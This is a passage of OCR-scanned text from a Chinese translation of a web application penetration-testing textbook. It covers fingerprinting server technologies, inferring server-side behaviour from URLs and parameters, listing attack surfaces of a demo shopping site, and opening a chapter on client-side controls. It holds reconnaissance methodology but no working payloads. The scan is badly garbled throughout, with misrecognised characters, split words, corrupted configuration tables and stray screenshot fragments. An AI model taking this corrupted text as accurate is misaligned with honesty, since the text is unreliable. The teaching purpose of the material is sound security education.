e Chick the ack button to try another fink 
È 4- rie D d 
Ire I waton "n 
one 


Bl4-13 ”请 求 一 个 无 法 识别 的 文件 扩展 名 时 生成 的 常规 错误 消息 


/DA 


使 用 前 面 描述 的 目 动 化 内 容 查 找 技巧 ， 我 们 能 够 请 求 大 量 第 见 的 
文件 扩展 名 ， 并 迅速 确定 服务 占 是 否 执行 了 任何 相关 技术 。 

之 所 以 出 现 上 述 不 同 的 行为 ， 十 因为 许多 Web 服 务 句 将 特殊 的 文 
件 扩展 名 映 喘 到 特定 的 服务 右 端 组 件 中 。 不 同 的 组 件 处 理 错误 的 方式 


(包括 请 求 不 存在 的 内 容 ) 也 各 不 相同 。 图 4-14 说 明了 默认 安装 IIS 
5.0 时 将 各 种 扩展 名 映射 到 不 同 处 理 程 序 DLL 的 情况 。 


Application Configuration l xj] 


App Mappings | App Options | App Debugging | 


WW Cache ISAP] applications 


Application Mappings 一 


A: WINNT \Systema2uwebhite dll GET HEAD 
i CAWINNT \System32\idg. dll GET.HEAD 
ida CAWINA TAS ystem32hidg. dll GET, HEAD 
asp CAWINNT \System32Z\inetstv‘\asp. dil GET HEAD 
Cer CAWINN T\System32Mnetsry \asp. dill GET HEAD 
ods CAWINNT\System32\inetsrv\asp. dil GET HEAD 
.SS CAWINAT \System32\inetsrv\asp. dll GET HEAD 
-htr C:AWINN T\system32\inetsrv‘\.asp. cll GET, POST 
„ide CAWINNT\Systems2\inetsrv\httpodbe.dil OPTIONS. 

.shtm C:AWINNT\System32\inetsrv\ssinc. cll GET,POST 

C:\WINNT\System32\inetsrv\ssinc. dil cer ener 

b 


-MNMT Sicha TA inetencLecine cil GET PAST 


Add | Erit | Remove | 


Cancel | Apply | Help | 


图 4-14 IIS5.0 中 的 文件 扩展 名 映射 


分 析 请 求 文件 扩展 名 时 生成 的 各 种 错误 消息 可 以 确定 该 文件 扩展 
名 映 射 是 否 存 在 。 在 某 些 情况 下 ， 发 现 一 个 特殊 的 英 射 可 能 表示 存在 
一 个 web 服务器 漏洞 。 例 如 ， 过 去 ，IS 中 的 .printer 和 .ida/.idq 处 理 程序 
易于 遭受 缓冲 区 洲 出 攻击 。 

类 似 于 下 面 的 URL 是 另外 一 种 值得 注意 的 常用 识别 方法 : 


https://wahh-app/news/0,,2-421206,00.html 
URLAR iE 5 or Pa BF H Vignette A BE E ER ° 
4. 目录 名 称 
一 些 子 目录 名 称 常常 表示 应 用 程序 使 用 了 相关 技术 。 例 如 : 
g servlet Java servlet; 
g pls Oracle Application Server PL/SQL X; 
口 cfdocs 或 cfide Cold Fusion; 
g SilverStream SilverStream Web 服 务 器 ; 
口 WebObjects 或 {function}.woa Apple WebObjects; 
g rails Ruby on Rails ° 
5. 会 话 令 牌 
许多 Web 服 务 器 和 和 Web 应 用 程序 平台 默认 生成 的 会 话 令 脾 名 称 也 
揭示 其 所 使 用 技术 的 信息 ， 例 如 : 


J JSESSIONID Java 平 台 ; 

口 ASPSESSIONID Microsoft IIS 服务 器 ; 

DQ ASP.NET_ SessionId Microsoft ASP.NET; 
gJ CFID/CFTOKEN Cold Fusion: 

J PHPSESSID —— PHP ° 

6. 第 三 方 代 码 组 件 


许多 Web 应 用 程序 整合 第 三 方 代码 组 件 执 行 第 见 的 功能 ， 如 购物 
车 、 登 示 机 制 和 公告 牌 。 这 些 组 件 可 能 为 开源 代码 ， 或 者 从 外 部 软件 
开发 者 购买 而 来 。 如 采 是 这 样 ， 那 么 相同 的 组 件 会 出 现在 因特网 上 的 
大 量 其 他 Web 应 用 程序 中 ， 可 以 根据 这 些 组 件 了 解 应 用 程序 的 功能 。 
通常 ， 其 他 应 用 程序 会 利用 相同 组 件 的 不 同 特性 ， 确 保 攻 击 者 能 够 确 
定 目标 应 用 程序 的 其 他 隐藏 行为 和 功能 。 而 且 ， 软 件 中 可 能 包含 其 他 
地 方 已 经 揭示 的 某 些 已 知 漏洞 ， 攻 击 者 也 可 以 下 载 并 安 厂 该 组 件 ， 对 
它 的 源 代码 进行 分 析 或 以 受 控 的 方式 探 碍 其 中 存在 的 缺陷 。 


渗透 测试 步骤 


(1) 确定 全 部 用 户 输入 入 口 点 ， 包 括 URL、 查 询 字 符 串 参 
数 、POST 数 据 、cookie 和 其 他 由 应 用 程序 处 理 的 HTTP 消 息 涉 。 

(2) 分 析 应 用 程序 使 用 的 查询 字符 串 格 式 。 如 果 应 用 程序 并 
未 使 用 第 3 章 描 述 的 标准 格式 ， 设 法 了 解 它 如 何 通 过 URL 提 区 参 
数 。 几 乎 所 有 定制 方案 仍然 使 用 名 / 值 模型 的 某 种 变化 形式 ， 因 此 要 
设法 了 解 名 / 值 对 如 何 被 封装 到 已 经 确定 的 非 标准 URL 中 。 

(3) 确定 任何 向 应 用 程序 处 理 过 程 引 入 用 户 可 控制 或 其 他 第 
三 方 数据 的 带 外 通道 。 

(4) 查看 应 用 程序 返回 的 HTTP 服 务 器 旋 标 。 注 意 ， 在 某 些 情 
况 下 ， 应 用 程序 的 不 同 区 域 由 不 同 的 后 端 组 件 处 理 ， 因 此 可 能 会 收 
到 不 同 的 Server 消 息 头 。 

(5) 检查 所 有 定制 HTTP 消 息 头 或 HTML 源 代码 注释 中 包含 的 
任何 其 他 软件 标识 符 。 

(6) 运行 Httprecon 工 具 识别 Web 服 务 器 。 

(7) 如 果 获 得 关于 Web 服 务 器 和 其 他 组 件 的 详细 信息 ， 搜 索 其 
使 用 的 软件 版 本 ， 确 定 在 发 动 攻击 时 可 供 利用 的 所 有 漏洞 (请 参阅 
第 18 章 了 解 相关 内 容 ) 。 

(8) 分析 应 用 程序 URL 列 表 ， 确 定 任何 看 似 重 要 的 文件 扩展 
名 、 目 录 或 其 他 提供 服务 恬 使 用 技术 相关 线索 的 内 容 。 
sie Pe 分 析 应 用 程序 发 布 的 全 部 会 话 令 牌 的 名 称 ， 确 定 其 使 用 

(10) 使 用 常用 技术 列表 或 Google 推 测 服务 器 所 使 用 的 技术 ， 
或 者 查找 其 他 明显 使 用 相同 技术 的 Web 站 点 和 应 用 程序 。 

(11) 在 Google 上 搜索 可 能 属于 第 三 方 软件 组 件 的 任何 不 常见 
的 cookie、 脚 本 、HTTP 消 息 头 名 称 。 如 果 发 现 使 用 相同 组 件 的 应 用 
程序 ， 对 其 进行 分 析 ， 确 定 该 组 件 支持 的 任何 其 他 功能 和 参数 ， 并 
确定 目标 应 用 程序 是 否 具有 这 些 功能 、 使 用 这 些 参数 。 注 意 ， 由 于 
品牌 定制 ， 相 同 第 三 方 组 件 在 每 个 应 用 程序 中 的 外 观 可 能 截然 不 
同 ， 但 其 核心 功能 (包括 脚本 和 参数 名 称 ) 往往 并 无 变化 。 如 有 可 
能 ， 下 载 并 安装 组 件 ， 对 其 进行 分 析 以 充分 了 解 它 的 功能 、 查 找 其 


中 存在 的 所 有 漏洞 。 同 时 ， 查 询 已 知 漏洞 库 ， 确 定 相关 组 件 中 存在 
的 所 有 已 知 漏洞 。 


4.2.3 确定 服务 器 端 功能 


通过 留意 应 用 程序 加 客户 端 披露 的 线索 ， 通 常 可 推 类 与 服务 堪 端 
功能 和 结构 有 关 的 大 量 信 息 ， 或 者 至 少 可 做 出 有 根据 的 猜测 。 

1. 仔细 分 析 请 求 

以 下 面 用 于 访问 搜索 功能 的 URL 为 例 : 

https://wahh-app.com/calendar.jsp? 

name=new%20applicants&isExpired=0&startDate=22%2F09%2F201 

0&endDate=22%2F03%2F2011&OrderBy=name 

可 见 ，.jsp 文 件 扩展 名 表示 它 使 用 Java Server Pages。 据 此 可 以 推 
Wt: 搜索 功能 从 索引 系统 或 数据 库 获 取信 息 ; OrderBy 人 参数 暗示 它 使 用 
后 端 数据 库 ， 提 交 的 值 将 被 SQL 查询 的 ORDER BY 子 名 使用。 和 数据 
库 查 询 使 用 的 其 他 参数 一 样 ， 这 个 参数 也 非常 容易 受到 SQL 注入 攻击 

〈 请 参阅 第 9 章 了 解 相关 内 容 ) 。 

在 这 些 参数 中 ，isExpired 字 段 同 样 值得 我 们 注意 。 很 明显 ， 这 是 
一 个 指定 搜索 查询 是 否 应 包含 已 到 期 内 容 的 布尔 型 标志 。 如 果 应 用 程 
序 的 设计 者 并 不 希望 用 户 访 问 任何 到 期 的 内 容 ， 将 这 个 参数 由 0 改 为 1 
就 能 够 确定 一 个 访问 控制 漏洞 (请 参阅 第 8 章 了 解 相关 内 容 ) e 
下 面 的 URL 人 允许 用 户 访问 内 容 管 理 系 统 ， 其 中 包含 男 外 一 些 线 

https://wahh-app.com/workbench.aspx? 

template=NewBranch.tpl&loc=/default&ver=2.31&edit=false 

这 里 的 .aspx 文 件 扩展 名 表示 这 是 一 个 ASPNET 应 用 程序 。 而 且 ， 
很 可 能 template 参 数 用 于 指定 一 个 文件 名 ，loc 人 参数 用 于 指定 一 个 目 
孙 。 很 明显 ， 文 件 扩展 名 .tpl 证 明了 上 述 推 论 ， 而 位 置 /default 很 有 可 能 
是 一 个 目录 名 称 。 应 用 程序 可 能 获得 指定 的 模板 文件 ， 并 将 其 内 容 包 
舍 在 啊 应 中 。 这 些 参 数 非常 容易 受到 路 人 径 授 历 攻击 ， 人 允许 攻击 者 读 取 
服务 器 上 的 任何 文件 (请 参阅 第 10 间 了解 相 关内 容 ) 。 

同样 值得 注意 的 是 edit 参 数 ， 它 被 设置 为 假 。 将 这 个 值 更 改 为 真 会 
修改 注册 功能 ， 可 能 允许 攻击 者 编辑 应 用 程序 开发 者 不 布 望 用 户 编辑 
的 数据 。 由 ver 参 数 并 不 能 推断 出 任何 有 用 的 线索 ， 但 修改 这 个 参数 可 
能 会 使 应 用 程序 执行 一 组 可 被 攻击 者 利用 的 不 同 功能 。 


最 后 ， 我 们 来 分 析 以 下 请 求 ， 它 用 于 同 应 用 程序 管理 员 提 出 问 


POST /feedback.php HTTP/1.1 
Host: wahh-app.com 


Content-Lengtn: 389 


from=user@wahh-mail.com&to=helpdesk@wahh-app.com&subject= 


Problem+logging+in&message=Pleasethelp... 


和 其 他 示例 一 样 ，.php 文 件 扩展 名 表示 它 使 用 PHP 语 言 执行 功 
能 。 而 且 ， 应 用 程序 极 有 可 能 正 通过 接口 与 一 个 外 部 电子 邮件 系统 连 
fe; 同时 ， 写 显示 使 用 电子 邮件 的 相关 字段 回 那 个 系统 提交 用 户 可 控 


制 的 输入 。 攻 击 者 可 利用 这 项 功能 向 任何 接收 者 发 送 任意 邮件 ， 并 
且 ， 其 中 所 有 字段 都 易于 遭受 电子 邮件 消息 头 的 注入 攻击 (请 参阅 第 
10 章 了 解 相关 内 容 ) 。 


YV 提示 在 猜测 请 求 不 同 部 分 的 功能 时 ， 通 常 有 必要 从 整个 
URL 和 应 用 程序 的 角度 进行 考虑 。 同 样 以 Extreme Internet Shopping 
应 用 程序 中 的 以 下 URL 为 例 : 

http://eis/pub/media/117/view 
在 功能 上 ， 此 URL 相 当 于 以 下 URL: 


http://eis/manager? 
schema=pub&type=media&id=117&action=view 

虽然 并 不 肯定 ， 但 media 资 源 集 中 很 可 能 包含 资源 117， 并 且 应 
dy ee 当 于 view 的 操作 。 检 查 其 他 URL 将 有 助 于 
确认 这 一 点 。 
首先 需要 考虑 将 view 操 作 更 改 为 其 他 可 能 的 操作 ， 如 edit 或 add。 但 
是 ， 如 果 将 其 更 改 为 add 并 且 猜 测 是 正确 的 ， 则 该 操作 可 能 相当 于 
添加 一 个 ID 为 117 的 资源 。 这 一 操作 将 会 失败 ， 因 为 已 经 存在 一 个 
ID 为 117 的 资源 。 最 佳 方案 是 ， 导 找 ID 值 大 于 观察 到 的 最 大 ID 值 的 
add 操 作 ， 或 选择 任意 较 大 的 值 。 例 如 ， 可 以 请 求 以 下 URL: 


http://eis/pub/media/7337/add 


此 外 ， 还 有 必要 通过 修改 media (同时 保留 类 似 的 URL 结 构 ) 
来 寻找 其 他 数据 集合 : 


http://eis/pub/pages/1/view 
http://eis/pub/users/1/view 


渗透 测试 步骤 


(1) 检查 提交 到 应 用 程序 的 全 部 参数 的 名 称 和 参数 值 ， 了 解 
它们 支持 的 功能 。 

(2) 从 程序 员 的 角度 考虑 问题 ， 想 象 应 用 程序 可 能 使 用 了 哪 
些 服务 硕 端 机 制 和 技术 来 执行 能 够 观察 到 的 行为 。 


2. 推测 应 用 程序 的 行为 

通 前 ， 应 用 程序 以 统一 的 方式 执行 其 全 部 功能 。 这 可 能 是 因为 不 
同 的 功能 由 同一 位 开发 者 编写 ， 或 者 可 遵循 相同 的 设计 规范 ， 或 者 共 
享 相同 的 代码 组 件 。 在 这 种 情况 下 ， 我 们 可 轻松 推 朵 出 服务 夯 端 某 个 
领域 的 功能 ， 并 据 此 类 推 其 他 领域 的 功能 。 

例如 ， 应 用 程序 可 能 会 执行 某 种 全 局 输入 确认 检查 ， 如 在 处 理 前 
净化 各 种 潜在 的 扯 意 输入 。 确 定 一 个 SQL 盲 注 漏洞 后 ， 会 过 到 如 何 利 
用 它 的 问题 ， 因 为 专门 设计 的 请 求 正 被 输入 确认 逻辑 以 不 可 见 的 方式 
修改 。 然 而 ， 应 用 程序 中 可 能 还 有 其 他 功能 为 正在 执行 的 净化 提供 民 
好 的 反 饿 ， 例 如 ， 将 用 户 提交 的 数据 “反射 给 浏 贤 套 的 功能 。 可 以 使 
用 这 项 功能 测试 不 同 编码 及 SQL 注入 有 效 载 竺 的 各 种 变化 形式 的 有 效 
性 ， 判 定 在 应 用 输入 确认 逻辑 后 ， 必 须 提交 哪些 原始 输入 才能 获得 想 
要 的 攻击 字符 串 。 如 果 幸 运 ， 会 发 现 整个 应 用 程序 使 用 相同 的 确认 机 
制 ， 让 攻击 者 可 以 利用 注入 漏洞 。 

当 在 客户 端 剑 存 敏感 数据 时 ， 一 些 应 用 程序 可 使 用 定制 的 模糊 处 
理 方案 ， 防 止 用 户 随意 查阅 和 修改 这 些 数据 (请 参阅 第 5 章 了 解 相 关内 
容 ) 。 由 于 只 能 访问 一 个 经 过 模糊 处 理 的 数据 样本 ， 这 类 模糊 处 理 方 
案 可 能 非常 难以 解 译 。 然 而 ， 应 用 程序 中 可 能 具有 某 些 功能 ， 用 户 癌 
其 提交 模糊 字符 串 即 可 获得 原始 字符 串 。 例 如 ， 错 误 消 息 中 可 能 包含 
导致 错误 的 反 模 糊 处 理 数据 。 如 采 整 个 应 用 程序 使 用 相同 的 模糊 处 理 
方案 ， 就 可 以 从 某 个 位 置 (如 cookie 中 ) 提取 一 个 模糊 字符 串 ， 将 其 
提交 给 其 他 功能 ， 解 译 出 它 的 意义 。 而 且 ， 我 们 还 可 以 对 模糊 处 理 方 
Rn 
得 到 的 结果 。 


最 后 ， 应 用 程序 处 理 各 种 错误 的 方式 并 不 一 致 ， 一 些 区 域 合理 防 
御 并 处 理 错 误 ， 而 另外 一 些 区 域 则 简单 放弃 错误 ， 回 用 户 返 回 元 长 的 
调试 信息 〈 请 参阅 第 15 章 了 解 相 关内 容 ) 。 在 这 种 情况 下 ， 我 们 可 以 
从 某 个 区 域 返 回 的 错误 消息 电 中 收集 相关 信息 ， 并 将 其 应 用 于 合理 处 理 
错误 的 其 他 区 域 。 例 如 ， 通 过 系统 化 地 操纵 请 求 参 数 并 监控 得 到 的 错 
误 消 上 息 ， 可 以 判定 相关 应 用 程序 组 件 的 内 部 结构 和 逻辑 ， 冬 运 的 话 会 
发 现 这 个 结构 的 某 些 方面 还 被 沿用 到 其 他 区 域 。 


渗透 测试 步骤 


(1) 确定 应 用 程序 中 任何 可 能 包含 与 其 他 区 域内 部 结构 和 功 
能 有 关 的 线索 的 位 置 。 

(2) 即使 暂时 无 法 获得 任何 肯定 的 结论 ， 但 是 ， 在 后 期 试图 
利用 任何 潜在 的 漏洞 时 ， 确 定 的 情况 可 能 会 有 用 。 


3. 隔离 独特 的 应 用 程序 行为 

有 时 ， 人 情况 可 能 恰恰 相反 。 许 多 可 靠 或 成 熟 的 应 用 程序 采用 一 至 
的 框架 来 防止 各 种 类 型 的 攻击 ， 如 跨 站 点 脚本 、SQL 注 入 和 未 授权 访 
问 。 在 这 类 情况 下 ， 最 可 能 发 现 漏 洞 的 区 域 ， 是 应 用 程序 中 后 续 添 加 
或 “拼接 ”而 其 常规 安全 框架 不 会 处 理 的 部 分 。 此 外 ， 这 些 部 分 可 能 没 
有 通过 验证 、 会 话 管理 和 访问 控制 与 应 用 程序 进行 正确 连接 。 一 般 情 
况 下 ， 通 过 GUI 外 观 、 参 数 命名 约定 方面 的 差异 ， 或 者 直接 通过 源 代 
码 中 的 注释 即 可 确定 这 些 区 域 。 


渗透 测试 步骤 


(1) 记录 其 使 用 的 标准 GUI 外 观 、 参 数 命 名 或 导航 机 制 与 应 用 


程序 的 其 他 部 分 不 同 的 任何 功能 。 

(2) 同时 记录 可 能 在 后 续 添 加 的 功能 ， 包 括 调试 功能 、 
CAPTCHA 控 件 、 使 用 情况 跟踪 和 第 三 方 代码 。 

(3) 对 这 些 区 域 进行 全 面 检查 ， 不 要 假定 在 应 用 程序 的 其 他 
区 域 实施 的 标准 防御 在 这 些 区 域 也 同样 适用 。 


4.2.4 解析 受 攻 击 面 


解析 过 程 的 最 后 一 个 步骤 是 确定 应 用 程序 暴露 的 各 种 受 攻 击 面 ， 
以 及 与 每 个 受 攻击 面 有 关 的 潜在 漏洞 。 下 面 简 要 说 明 渗 透 测 试 员 能 够 
确定 的 一 些 主要 行为 和 功能 ， 以 及 其 中 最 可 能 发 现 的 漏洞 。 本 书 的 其 
他 内 容 将 详细 讨论 渗透 测试 员 如 何在 实际 操作 过 程 中 探测 并 利用 这 些 
漏洞 。 
口 客户 端 确认 一 服务 器 没有 采用 确认 检查 。 
口 数 据 库 交 互 一 一 SQL 注 入 。 
口 文件 上 传 与 下 载 一 -路径 遍历 漏洞 、 保 存 型 跨 站 点 脚本 。 
口 显示 用 户 提交 的 数据 一 一 跨 站 点 脚本 。 


口 动 态 重 定 辣 一 一 重 定 问 与 消 轧 关注 入 攻击 。 
口 社交 了 网络 功 能 一 一 用 户 名 枚 举 、 保 存 型 跨 站 点 脚本 。 


口 登录 一 一 用 户 名 枚 举 、 脆 弱 密 码 、 能 使 用 蛋 力 。 


口 多 阶段 登录 一 一 登录 缺 陶 。 


口 会 话 状 态 一 一 可 推测 出 的 令 牌 、 令 牌 处 理 不 安全 。 

口 访问 控制 一 一 水 平权 限 和 垂直 权限 提升 。 

口 用 户 伪 痛 功能 一 一 权限 提升 。 

口 使 用 明文 通信 一 一 会 话 支持、 收集 证 书 和 其 他 敏感 数据 。 
口 站 外 链接 一 一 Referer 消 息 尖 中 查询 字符 串 参 数 泄 漏 。 
口外 部 系统 接口 一 一 处 理会 话 与 /或 访问 控制 的 快捷 方式 。 


信息 泄漏 


口 错误 消息 Avy Ji 9 
电子 邮件 与 命令 注入 。 


口 电 子 邮 件 交 互 


口 本 地 代码 组 件 或 交互 一 一 缓冲 区 溢出 。 

口 使 用 第 三 方 应 用 程序 组 件 一 一 已 知 漏洞 。 
er: 已 确定 的 Web 服 务 器 软件 一 一 常见 配置 薄弱 环节 、 已 知 软件 程 
F ERG © 


4.2.5 解析 Extreme Internet Shopping 应 用 程序 


解析 EIS 应 用 程序 的 内 容 和 功能 后 ， 攻 击 者 可 以 通过 各 种 路 径 对 该 
应 用 程序 实施 攻击 ， 如 图 4-15 所 示 。 


| target | proxy | spider | scanner | intruder | repeater | SANCOr f decoder ] comparer | optons 


? Gauth 
[|] Forgot@assword 


ResotFassword 
[O register 
? a core 
9 B siesta 
E) pacelO-=momeddisplay=rankthitstime 


| ‘| i I 


| on | request | 
(raw | neacers | hex | nimi | render | 


If <b3><a bret<*/shop/browse">ALL</a> Get; < 

7| Pncet="/shop/brevse/books/">books</a> &at; 
AuloMaling-ebating Burp</ 1.3 ><he> 
<bS-Autotating-eDating Burp (£35)</hS-Ran 
through thousands of online users at high 
Speed using methods incinding Siper, 
Battering Ram, or even Pitchfork. <br><br> 
<br 


<input type=button value="Eack" 
ontlick="documrent. location.ceplace('/shop’); 
class "btn"> 


© Codec incking_my-stary 
~ DyPentesting-Theiland-Editon shales 
> (Q)SOL-injection-Apain prap 
~ (5) Security-Jokes-vol-3_Per! 
~ WAHHH W2 

¢ G dohing r PE 

bm TA hochicoice | 一 一 


图 4-15 ”EIS 应 用 程序 暴露 的 受 攻击 面 


/auth 目 孙 包 含 验 证 功能 。 为 此 ， 有 必要 仔细 检查 所 有 验证 功能 、 
会 话 处 理 和 访问 控制 ， 包 括 其 他 内 容 搜索 攻击 。 


在 /core 路 径 内 ， 站 点 状态 页 面 似乎 接受 由 管道 符 ( | ) 分 隔 的 参 
数 构成 的 数组 。 除 传统 的 基于 输入 的 攻击 外 ， 还 可 以 对 source、 
location 和 IP 这 些 值 实施 蛮 力 攻击 ， 以 揭示 有 关 其 他 用 户 或 在 pageID 中 
指定 的 页 面 的 详细 信息 。 另 外 ， 还 可 以 搜索 有 关 无 法 访问 的 资源 的 信 
妃 ， 或 者 在 pageID 中 答 试 使 用 通配符 ， 如 pageID=all 或 pageID=*“。 最 
后 ， 由 于 显示 的 pageID 值 中 包含 竹 杠 ， 这 表示 应 用 程序 可 能 正 从 文件 
系统 检索 资源 ， 因 而 可 以 对 其 实施 路 径 遇 历 攻击 。 

/gb 路 人 径 包含 该 站 点 的 留言 板 。 访 问 此 页 面 后 发 现 ， 这 是 一 个 由 管 
理 员 主持 的 讨论 论坛 。 虽 然 其 中 的 消息 由 管理 员 进 行 管理 ， 但 却 采 用 
了 登录 避 开 机 制 login=true， 这 说 明 攻击 者 可 以 尝试 批准 恶意 消息 (以 
STUBS IS ABA CE) ， 以 及 阅读 其 他 用 户 发 送 给 管理 员 的 私有 消 

home 路 径 似乎 保存 的 是 经 过 验证 的 用 户 内 容 。 基 于 这 一 点 ， 攻 击 
者 可 以 党 试 实施 水 平权 限 提 升 攻击 ， 以 访问 其 他 用 户 的 个 人 信息 ， 并 
确保 在 每 个 页 面 实施 了 访问 控制 。 

快速 检查 后 发 现 ，/icons 和 /images 路 径 保存 的 是 静态 内 容 。 这 说 明 
可 以 党 试 对 属于 第 三 方 软件 的 图 标 名 称 实施 蛋 力 攻击 ， 并 检查 这 些 目 
KIA RES, (ARMS EI ° 

/pub 路 径 的 /pub/media 和 /pubmser 目 孙 下 包含 的 是 REST 风 格 的 资 
源 。 这 说 明 可 以 针对 /pub/usev11 中 的 数字 值 实施 蛮 力 攻击 ， 以 查找 其 
他 应 用 程序 用 户 的 个 人 资料 页 面 。 与 此 功能 类 似 的 社交 网 络 功能 可 以 
揭示 用 户 信 息 、 用 户 名 和 其 他 用 户 的 登录 状态 。 

/Shop 路 径 中 包含 网 上 购物 站 点 和 大 量 URL。 但 是 ， 这 些 URE 的 结 
构 大 致 相同 。 仅 碍 看 一 或 两 个 URL， 攻 击 者 就 可 以 确定 所 有 相关 的 受 
攻击 面 。 购 物 过 程 中 可 能 包含 有 趣 的 逻辑 缺陷 ， 攻 击 者 可 以 利用 这 些 
缺陷 获得 未 授权 折扣 或 逃避 文 付 。 


渗透 测试 步骤 


(1) 了 解 应 用 程序 执行 的 核心 功能 和 使 用 的 主要 安全 机 制 。 


(2) 确定 通常 与 常见 漏洞 有 关 的 应 用 程序 功能 和 行为 特点 。 

(3) 在 公共 漏洞 数据 库 (如 www.osvdb.org) 中 检查 任何 第 三 
方 代码 ， 以 确定 任何 已 知 问题 。 

(4) 制订 攻击 计划 ， 优 先 考 虑 最 可 能 包含 漏洞 的 功能 ， 以 及 
BY BLA Yale ° 


4.3 小结 


解析 应 用 程序 是 同 其 发 动 攻击 的 重要 前 提 。 虽然 直接 发 动 攻击 并 
开始 探查 实际 漏洞 的 做 法 十 分 具有 吸引 力 ， 但 详细 了 解 应 用 程序 的 功 
能 、 技 术 与 受 攻 击 面 更 利于 后 面 的 攻击 。 

在 几乎 所 有 的 Web 应 用 程序 攻击 中 ， 在 采用 手动 技巧 的 同时 ， 适 
当 采 用 受 欣 的 目 动 化 技巧 是 最 有 效 的 攻击 手段 。 几 乎 不 存在 任何 完全 
目 动 化 的 工具 ， 能 够 对 应 用 程序 进行 安全 、 彻 克 的 解析 。 要 解析 应 用 
程序 ， 渗 透 测 试 员 需 要 目 己 动手 并 利用 相关 经 验 。 本 章 讨论 的 核心 技 
术 包 括 以 下 几 项 。 

口 手动 浏览 和 用 户 指定 的 抓 了 到， 枚 举 应 用 程序 的 可 见 内 容 与 主要 


口 使 用 蛮 力 结合 人 为 干预 和 直觉 发 现 尽 可 能 多 的 隐藏 内 容 。 

口 对 应 用 程序 进行 智能 分 析 ， 确 定 其 关键 功能 、 行 为 、 安 全 机 制 
与 技术 。 

口 评估 应 用 程序 的 受 攻击 面 ， 确 定 最 易 受到 攻击 的 功能 和 行为 ， 
对 其 执行 更 有 针对 性 的 探查 ， 以 发 现 可 供 利用 的 漏洞 


4.4 fa 


欲 知 问题 答案 ， 请 访问 http:/mdsec.net/wahh ° 
(1) 当 解 析 一 个 应 用 程序 时 ， 会 遇 到 以 下 URL: 


https://wahh-app.com/CookieAuth.dll?GetLogon? 
curl=Z2Fdefault.aspx 
o 以 推论 出 服务 器 使 用 何 种 技术 ? 该 技术 的 运作 方式 可 能 是 
EPEAT? 
(2) 如 果 所 针对 的 应 用 程序 是 一 个 Web 论 坛 ， 并 且 只 发 现 了 一 个 
URL: 


http://wahh-app.com/forums/ucp.php?mode=register 
如 何 通过 它 获得 论坛 成 员 列 表 ? 
(3) 当 解 析 一 个 应 用 程序 时 ， 遇 到 以 下 URL: 


https://wahh-app.com/public/profile/Address.asp? 
action=view&location=default 
据 此 推断 服务 句 端 应 使 用 何 种 技术 。 可 能 还 存在 哪些 其 他 内 容 和 
功能 ? 
(4) Web 服 务 器 的 一 个 响应 包含 以 下 消息 头 : 


Server: Apache-Coyote/1.1 
JX ARAB ARH AE ATERRAR? 
(5) 假设 正在 解析 两 个 不 同 的 Web 应 用 程序 ， 在 每 个 应 用 程序 中 
ta KURL/admin.cpf ° ASKA I AY YA SKATE Pitas ° (IE 
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HTTP/1.1 200 OK 

Server: Micrcsoft-IIs/5.0 

Expires: Mon, 20 Jun 2011 14:59:21 GMT 

Content-Location: http://wahh- 
app.com/includes/error.ntm?404;http://wahh-app.com/admin, cpf 
Date: Mon, 20 Jun 2011 14:59:21 GMT 

Content-Type: text/html 

Accept-Ranges: bytes 

Content-Length: 2117 


HTTP/1.1 401 Unauthorized 

Server: Apache-Coyote/1.1 

WwW-Authenticate: Basic realm="Wahh Administration Site" 
Content-Type: text/html;charset=utf-8 

Content-Length: 954 

Date: Mon, 20 Jun 2011 15:07:27 GMT 

Connection: close 


第 5 章 
避 开 客户 器 控件 


在 第 1 章 中 ， 我 们 提 到 ， 由 于 客户 端 可 提交 任意 输入 ，Web 应 用 
程序 的 核心 安全 因此 受到 威胁 。 尽 管 如 此 ， 大 部 分 的 Web 应 用 程序 仍 
然 依靠 在 客户 端 执行 各 种 措施 ， 对 它 提交 给 服务 器 的 数据 进行 控制 。 
通常 ， 这 种 做 法 造成 一 个 基本 的 安全 缺陷 ， 用 户 能 够 完全 控制 客户 端 
和 自 其 提交 的 数据 ， 并 可 以 各 开 任何 在 客户 瑞生 但 服务 器 并 不 采用 

应 用 程序 依靠 客户 端 控件 限制 用 户 输入 表现 在 两 个 方面 ， 首 先 ， 
应 用 程序 可 通过 客户 端 组 件 ， 使 用 某 种 它 认为 可 防止 用 户 修改 的 机 制 
传送 数据 。 其 次 ， 应 用 程序 可 在 客户 端 执 行 保护 措施 ， 控 制 用 户 与 其 
客户 端的 交互 ， 从 而 对 功能 实施 限制 ， 并 (或 ) 在 提交 用 户 输入 之 前 
对 这 些 输入 进行 控制 。 我 们 可 通过 使 用 HTML 表 单 功 能 、 客 户 端 脚本 
或 浏览 器 扩展 技术 实现 这 种 控制 。 
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5.1 通过 客户 端 传送 数据 


应 用 程序 通常 以 终端 用 户 无 法 直接 查看 或 修改 的 方式 同 客 尸 端 传 
送 数 据 ， 布 望 客户 问 在 随后 的 请 求 中 将 这 些 数 据 送 回 服务 器 。 通 第， 
应 用 程序 的 开发 者 简单 地 认为 所 采用 的 传输 机 制 将 确保 通过 客户 端 传 
送 的 数据 在 传送 过 程 中 不 会 遭 到 修改 。 

由 于 客户 端 加 服务 大 传送 的 一 切 内 容 都 完全 处 于 用 户 的 控制 范围 
内 ， 认 为 通过 窗户 端 传送 的 数据 不 会 被 修改 ， 这 种 看 法 往往 是 错误 
的 ， 并 致使 应 用 程序 易于 遭受 一 种 或 儿 种 攻击 。 

你 肯定 想 知道 这 其 中 的 原因 。 如 有 果 一 个 特殊 的 数据 已 知 ， 并 由 服 
务 器 指定 ， 则 应 用 程序 需要 向 客户 端 提交 这 个 值 ， 然 后 读 取 回 该 值 。 
a 0 RR 
因 如 下 。 

口 这 样 做 不 必 人 退 踪 用 户 会 话 中 的 各 种 数据 。 减 少 每 次 会 话 保 存在 
服务 器 上 的 数据 量 ， 同 时 还 能 提高 应 用 程序 的 性 能 。 

口 如 采 将 应 用 程序 部 车 到 几 台 不 同 的 服务 袁 上 ， 那 么 ， 在 执行 多 
级 操作 时 ， 用 户 可 能 需要 与 多 台 服 务 紫 进行 交互 ， 这 时 在 处 理 相同 用 
尸 请 求 的 主机 之 间 共 至 服务 右 端 数据 束 会 遇 到 困难 。 那 么 ， 使 用 客户 
端 传送 数据 就 成 为 解决 这 个 问题 的 一 个 颇具 吸引 力 的 方案 。 

口 如 条 应 用 程序 在 服务 右上 采用 任何 第 三 方 组 件 ， 如 购物 车 ， 则 
可 能 很 难 或 无 法 修改 这 些 组 件 ， 因 此 ， 通 过 客户 端 传输 数据 吏 成 为 集 
成 这 些 组 件 的 最 简单 方式 。 

